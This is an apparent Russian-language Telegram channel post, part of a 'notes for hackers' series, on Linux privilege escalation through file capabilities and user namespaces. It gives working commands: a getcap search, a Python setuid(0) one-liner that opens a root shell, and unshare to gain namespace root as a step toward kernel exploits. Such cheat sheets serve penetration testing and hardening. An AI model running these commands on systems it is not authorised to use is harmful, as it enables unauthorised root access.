TGViewer
Proxy Bar Proxy Bar @proxy_bar · 21.5K subscribers
Post #3192 7.78K
Рубрика На заметку $USERNAME@hacker.wtf - part 8
*

*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились Capabilities !
Отдельные привилегии , дающие значок шерифа (например меняя UID).

Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID

Кстати иногда админы отдают capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.
*
*

Namespaces Abuse
Вообще namespaces изолируют ресурсы: PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace

#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)

А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих kernel privilege escalation присутствует.
То есть можно:
mkdir lower upper work merged

И смонтировать overlay = OverlayFS/FUSE/kernel permission bypass

Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m

#РубрикаНаЗаметкуХакеру
  • 🔥 14
  • 👍 12
More from @proxy_bar
  1. Sep 30, 2026Закончилось Всем спасибо Организаторам за то что учли и исправили косяки прошлого года, fr…
  2. Sep 30, 2026После обеда доклады продолжаются !!!
  3. Sep 30, 2026Достать мерч в этом году стало проще, но быстро разбирают
  4. Sep 30, 2026Стартовал zeroNights 2026 #zeronights2026
  5. Sep 30, 2026Пора выдвигаться ! Увидимся внутри $USERNAME #zeronights2026
  6. Sep 28, 2026CVE-2026-19444: kubectl 😆😆😆
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →